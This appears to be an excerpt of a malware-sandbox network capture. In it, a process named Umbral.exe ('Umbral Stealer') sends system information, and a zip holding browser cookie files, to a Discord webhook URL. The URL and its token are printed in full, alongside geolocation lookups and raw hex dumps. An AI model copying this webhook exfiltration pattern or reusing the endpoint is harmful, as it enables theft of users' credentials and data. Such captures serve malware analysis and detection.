                                      2024-09-06 23:47:46 UTC1369INData Raw: 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76
                                      Data Ascii: ; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100v
                                      2024-09-06 23:47:46 UTC1083INData Raw: 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36
                                      Data Ascii: path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936
                                      2024-09-06 23:47:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.549732162.159.135.2324432316C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:49 UTC360OUTPOST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: discord.com
                                      Content-Length: 941
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:50 UTC25INHTTP/1.1 100 Continue
                                      2024-09-06 23:47:50 UTC941OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 39 32 37 35 33 37 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 32 45 44 39 32 37 34 32 2d 38 39 44 43 2d 44 44 37 32 2d 39 32 45 38 2d 38 36 39 46 41 35 41 36 36 34 39 33 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                      Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                      2024-09-06 23:47:50 UTC1369INHTTP/1.1 204 No Content
                                      Date: Fri, 06 Sep 2024 23:47:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      set-cookie: __dcfduid=6d301fc26caa11efa3d2c623c3b98d08; Expires=Wed, 05-Sep-2029 23:47:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666471
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBchsQlQ4GOx%2FXyO0hFkldTXnRW%2FAhlPr1peuVxxsSolP2BXGZ4op0fn3k8uoTP1R7zkpB0uilGShD0Vj%2BMC3uIP2Ku7%2FdoK0d3Zq1gSSyqN6V8f%2BjP9m1xndT5p"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=6d301fc26caa11efa3d2c623c3b98d08c1f95b58700f8a4571545f2214b20896420ace1a3b8fe25cc0b20d985e4d9dfe; Expires=Wed, 05-Sep-2029 23:47:50 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=9faf4540b5e2e5ca23872438014c6cbdeec7fa72-1725666470; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie:
                                      2024-09-06 23:47:50 UTC200INData Raw: 20 5f 63 66 75 76 69 64 3d 6e 4a 47 38 34 61 63 44 31 58 77 4e 64 4f 53 6d 38 7a 4e 5f 69 54 4f 48 31 32 39 39 38 47 78 73 55 73 62 4d 47 36 4f 32 43 68 30 2d 31 37 32 35 36 36 36 34 37 30 34 30 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 66 32 35 38 61 63 37 63 32 39 34 32 33 65 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii: _cfuvid=nJG84acD1XwNdOSm8zN_iTOH12998GxsUsbMG6O2Ch0-1725666470400-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8bf258ac7c29423e-EWR


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17192.168.2.549734188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:50 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:50 UTC639INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:50 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tb1%2FNJ149u7aMkY6asfQMmgbkcgKAJDmrBUfgctFPAtG7N37NUUUxCeUmNruoo2%2FiPnK6JZcqOet4qr3DkS0wbpT43iYBKDfcMnV%2BuiQ3aEFkYfHoIXJrUWyCkJk8167"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258af3b7243ef-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:50 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18192.168.2.549735104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:50 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:50 UTC734INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7871
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSAZWHJN4VQSRHZX4485H
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxyH9xG%2BA25CKhwaL6jxsH8eZ3JesWF05W8qIANunKM8WKIGFexREnq6SSDPm3XInYVIOqDxqdFOnyXfjK8BZ6Oy2YsIPKQdgN%2B2wYbrCZ7p%2BU8L9Afxk87J6Oqe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258b30c3742bc-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:50 UTC635INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:50 UTC1369INData Raw: 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30
                                      Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 10
                                      2024-09-06 23:47:50 UTC1085INData Raw: 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432949
                                      2024-09-06 23:47:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.549738162.159.135.2324432316C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:50 UTC684OUTPOST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="86cdf539-8c56-4021-b5f7-2a105be5405a"
                                      Host: discord.com
                                      Cookie: __dcfduid=6d301fc26caa11efa3d2c623c3b98d08; __sdcfduid=6d301fc26caa11efa3d2c623c3b98d08c1f95b58700f8a4571545f2214b20896420ace1a3b8fe25cc0b20d985e4d9dfe; __cfruid=9faf4540b5e2e5ca23872438014c6cbdeec7fa72-1725666470; _cfuvid=nJG84acD1XwNdOSm8zN_iTOH12998GxsUsbMG6O2Ch0-1725666470400-0.0.1.1-604800000
                                      Content-Length: 454876
                                      Expect: 100-continue
                                      2024-09-06 23:47:51 UTC25INHTTP/1.1 100 Continue
                                      2024-09-06 23:47:51 UTC40OUTData Raw: 2d 2d 38 36 63 64 66 35 33 39 2d 38 63 35 36 2d 34 30 32 31 2d 62 35 66 37 2d 32 61 31 30 35 62 65 35 34 30 35 61 0d 0a
                                      Data Ascii: --86cdf539-8c56-4021-b5f7-2a105be5405a
                                      2024-09-06 23:47:51 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 0d 0a 0d 0a
                                      Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
                                      2024-09-06 23:47:51 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 f6 9d 26 59 1f 2a 43 8d ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 a1 09 21 a4 5d 74 01 2d 08 34 02 ca 6f 60 d3 01 a2 a0 83 32 7c 1a 94 d3 77 a6 07 e8 3b c0 53 9a be 6f ba 93 52 f7 37 10 1f 13 0b bc 00 db e0 91 05 30 21 1a d1 de 54 0d 53 a6 23 5d 27 00 87 df 9e 71 04 2a 52 09 c4 08 22 0d 62 b2 dd 28 ff 04 54 67 18 eb 7f 01 43 0c f8 ee 27 a0 18 bf 5b 67 2a 43 7b b7 c0 7d 91 f7 b4 5d 4e 10 c5 ad 91 4e 5d f5 a8 6e 52 a4 c5 52 3b f7 21 5d 33 c7 48 b0 26 29 d9 fb 38 95 8b 3c 0c af 55 99 9f 1b 15 ba c6 3c 14 66 4a fd 80 d3 51 5e 55 3f 73 87 71 25 8c 25 2d 17 ce 1c 34 16 9c bd d2 ec 12 33 f7 ac f6
                                      Data Ascii: PK&Y*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
                                      2024-09-06 23:47:51 UTC16355OUTData Raw: b3 75 a5 b6 11 7a 21 1c 29 1a 1f 2b 9e 4f 78 85 1f 6d 10 bf 64 3f ee 2c fe 6c 20 7a e1 1e 45 01 7a 57 d4 97 18 44 9b 3e 71 70 ed 7f 2b d4 bc 1f a6 b9 93 aa ab b5 38 11 57 06 3a 1a 69 cf f1 df 15 58 10 51 25 27 a4 6c 5f dc dd 27 e0 e4 de 0f 56 72 45 ed 95 25 24 a4 54 94 f3 bc 37 a9 dc 93 54 79 16 92 f2 74 1d c3 68 1a b3 a7 4d d1 25 c8 25 a6 d8 20 99 2d e2 b9 35 dd 6a d1 8e 93 ec 97 da 14 e1 ba 7f e4 49 32 1e 82 7a b1 15 60 2b 16 d3 58 73 60 47 9b ff 4c 26 75 08 2f 25 19 f0 d1 34 b6 04 0c be 0a 6f 18 f9 bc d0 5e 4e 8f 43 c2 90 8e 59 12 cf b8 a4 b1 4a d7 31 97 22 f3 80 56 94 1e b7 63 3c 77 e2 c2 df 07 5a 52 56 d7 fd b1 6f 1e 72 df dd ff 75 6a 95 e1 b2 b9 f1 55 89 a9 99 63 be b4 59 4a 07 a6 53 4a eb 9c c9 95 29 2f 47 e0 0f ca b5 75 2d 94 b0 e9 41 f1 d1 b9 55
                                      Data Ascii: uz!)+Oxmd?,l zEzWD>qp+8W:iXQ%'l_'VrE%$T7TythM%% -5jI2z`+Xs`GL&u/%4o^NCYJ1"Vc<wZRVorujUcYJSJ)/Gu-AU
                                      2024-09-06 23:47:51 UTC16355OUTData Raw: 84 60 8d a5 48 6b 5e 15 16 99 52 88 e2 0f 8b 7a f1 1f a6 b5 b7 ee 5b 35 dd 57 dc fd d3 6e 74 2d 44 95 fb 6f 43 39 6d 6e 1c 69 4c 13 40 7c d6 b6 28 73 2e 98 b4 a8 5c 7f db c2 6b 36 45 f9 c3 3a ba 2d f8 de bb a6 b5 e5 dd 5d c9 36 e6 36 d2 e4 b8 ed d2 53 ce 88 08 83 f3 7e 4c db 55 77 b7 16 51 8b f7 bf 1f d8 ae 64 1e 70 1b 43 2a ce 54 71 bf ba 79 3c e6 cd a5 51 af 1f e5 6c a9 b4 3e b2 78 3f d0 bd 7b 0b 27 23 13 69 7e d9 22 35 18 4f 76 59 7d c8 68 c0 52 f7 46 a0 fb 54 de 06 ec 5a 60 fd 18 b1 75 3f a8 a9 fe bc 44 a6 a3 db fc a1 17 f2 ce 63 ab d9 a7 43 e8 7c d3 92 a3 e5 9e 8b 44 bb 1c 38 32 e3 14 14 ad bc ae 09 5b 6a 8f 18 42 15 1e ad 27 74 91 5a cb 3f 28 7a b9 bd e6 e2 c0 48 05 5a 43 8c dc 7e 93 9b 8b fe f8 b0 af 31 8d c2 48 1b cb 23 89 48 a3 5f 5b 6e 63 eb 50
                                      Data Ascii: `Hk^Rz[5Wnt-DoC9mniL@|(s.\k6E:-]66S~LUwQdpC*Tqy<Ql>x?{'#i~"5OvY}hRFTZ`u?DcC|D82[jB'tZ?(zHZC~1H#H_[ncP
                                      2024-09-06 23:47:51 UTC16355OUTData Raw: 3d b3 0e 48 1b d9 8c e8 9b f0 47 2f 39 d7 96 b0 23 36 00 39 20 6e e0 88 d5 88 09 d3 14 91 76 24 2f 37 5c c6 c1 c2 a1 45 87 8e fd 63 d8 61 fe a0 c2 a9 ec 9b 33 37 7b f9 e9 73 4c b2 60 d9 ba ce 6d b0 1f 93 6d 0c 2c 9d 5c 0d 8a 27 67 3f 6a a9 bb 2b 68 05 88 05 19 80 95 f3 40 42 ad 55 3e 05 26 79 44 e4 72 af d9 60 2e 20 a7 3b 0d d4 83 32 fb 05 f6 33 7b 12 66 6a b4 29 33 2e d0 d2 ae 6e cb 8e d8 4e 35 1a aa 7c 53 cb 8d 1e ef d5 12 89 43 5e 71 93 10 ad c0 72 af 3c 1f 51 e3 0d 99 da f0 38 69 eb ee 34 c6 fd 4b 74 b6 f5 2d 63 e6 07 6c 85 ad f9 de 17 15 e4 8f 33 1f cf 8a cd d5 bc ee ce fe 11 59 65 2a f7 ec 52 d1 23 f0 94 59 72 88 7f 94 f2 4a 9c b7 5b 6d dc a9 88 d2 5e ff e2 d2 38 a1 bd d8 c3 aa 49 26 bf fc a9 59 56 d9 be d8 30 84 64 77 7d f6 6e 44 b9 44 a6 34 d0 41
                                      Data Ascii: =HG/9#69 nv$/7\Eca37{sL`mm,\'g?j+h@BU>&yDr`. ;23{fj)3.nN5|SC^qr<Q8i4Kt-cl3Ye*R#YrJ[m^8I&YV0dw}nDD4A
                                      2024-09-06 23:47:51 UTC16355OUTData Raw: 4a cd f4 fb 22 51 47 65 74 10 11 7e 44 64 53 61 59 57 75 1d 15 55 47 55 31 58 02 8c b7 9f 38 73 4d b6 b5 50 aa 40 1c d9 dc 14 f0 5d b4 05 09 a4 ef f4 93 2e 77 92 7a 70 6d 81 06 41 d6 5f 12 a6 ab d3 3f bc db 6e 31 af c9 81 61 03 5c fe 98 cb bf 7b 67 0f f6 99 d8 de e8 e3 05 33 b9 48 79 55 44 98 0a 58 ee 6e 10 0d 83 74 aa 8a 2b ce b7 6b 1f 5f 54 fd e7 1c ff 39 7f 96 8f 04 79 18 54 79 8d 3f e1 be 40 6d d8 43 cb 96 46 33 0c db ec 74 03 02 e5 9e 99 d5 75 37 56 e2 71 6c 48 03 5f 20 ae 6d 80 df 50 4a 81 d3 f2 48 45 24 19 55 55 76 da 87 6b 91 40 6e 12 8e aa 06 ce 4f 8f 62 b9 5a e8 c8 d7 50 e7 3d b5 1f 6d d6 e5 d8 3a b0 f3 5a b2 e1 ea 30 ec 51 57 48 1c 3f a7 8a de a5 fd 20 c5 b3 16 7d 56 80 87 ea 96 82 9a 3c aa fc 2d 1c da 5a af c4 4d 5c b8 f5 21 af d5 f0 e1 95 e0
                                      Data Ascii: J"QGet~DdSaYWuUGU1X8sMP@].wzpmA_?n1a\{g3HyUDXnt+k_T9yTy?@mCF3tu7VqlH_ mPJHE$UUvk@nObZP=m:Z0QWH? }V<-ZM\!
                                      2024-09-06 23:47:51 UTC16355OUTData Raw: 77 43 a6 08 c8 18 42 37 98 2e 7f 28 30 5d be 3c 79 a4 05 7a c9 ac 9c 98 46 f0 35 df 90 63 ba c6 6b 0f cb 1f 8a 76 55 ca 99 3c 3a eb 24 76 de cc 74 61 3b 78 dd de b0 f6 3b 23 e4 51 72 24 af ee 43 a8 67 03 f2 5c 4f f9 e5 44 7f 89 05 4f 13 5d c4 74 2b ed 62 57 6b 08 dd 42 4a 10 05 9f 93 58 fe b0 bc 6d 35 2f bd 05 09 89 83 67 97 ae f9 f3 41 30 2d 90 07 39 43 15 f2 e7 a6 c7 22 78 3f 55 1f 2e 0e d1 2f 47 aa 66 47 e2 08 a8 39 a8 a8 3e 00 0e 3f ed ec 40 97 e3 78 8a 31 d2 45 6d 8a 3f 3f c4 0b 6f 75 e9 2a 7f 6b 7e bd 60 de 72 43 c0 5b 3f 23 64 23 97 71 52 06 f8 72 14 d5 d1 f4 42 2d e9 be 4a d5 9b 9f a1 3c 7e b8 b4 6b 4a c6 97 88 b3 ad 55 cb 8c ff 02 23 aa 9c 30 76 a3 ae 8b 37 05 69 12 d4 49 ec dc fc f4 c4 6d 79 63 39 17 89 b8 ff 38 e8 3b 6f f3 82 38 db 53 37 82 68
                                      Data Ascii: wCB7.(0]<yzF5ckvU<:$vta;x;#Qr$Cg\ODO]t+bWkBJXm5/gA0-9C"x?U./GfG9>?@x1Em??ou*k~`rC[?#d#qRrB-J<~kJU#0v7iImyc98;o8S7h
                                      2024-09-06 23:47:51 UTC16355OUTData Raw: 7e f8 9a 5b 99 02 91 7f 5e e2 c2 c0 c9 77 12 5c 2e 77 6f 0e 85 a3 57 9b 6a b9 23 24 08 77 9e b7 f4 9d f9 dc d1 da fd 92 b7 f4 6a 4f 4f b4 77 be d8 a1 5d 55 9e 07 27 48 a2 5f e0 39 4f 72 96 2e 91 81 88 4b 9f 66 17 64 dd af 56 5f 3d af 99 1e b1 9a 55 00 ce 13 f4 2e 0a bc 45 2b 1d 5a de c1 50 de 32 0c 64 41 97 38 74 24 b0 16 1a 4c e2 d5 6e 53 be 8b 8a d3 71 f1 b3 d8 b1 27 4a da bf 6f 48 85 3b 66 ac 0b 7c e8 bb e1 2e bc 7a d2 da cc 35 55 b8 f1 a4 22 25 39 fa 9b 75 03 c3 58 de 2a 32 4b cd 3f f2 01 a5 5c 95 25 9e a8 7f bc 52 9d 71 c8 4c ef c2 71 09 14 4c 75 41 d2 82 5f 47 73 16 27 e5 93 1a 55 6c 68 1b 81 41 d4 16 03 d2 7e cd 1b 95 6e 5f 56 95 d8 93 0a 02 35 c6 ae d8 8c 69 a6 62 ec 10 4a 80 33 fd f6 41 86 f4 54 4e d9 6e 68 77 eb a2 8f 4c 15 39 3b ac b1 25 98 14
                                      Data Ascii: ~[^w\.woWj#$wjOOw]U'H_9Or.KfdV_=U.E+ZP2dA8t$LnSq'JoH;f|.z5U"%9uX*2K?\%RqLqLuA_Gs'UlhA~n_V5ibJ3ATNnhwL9;%
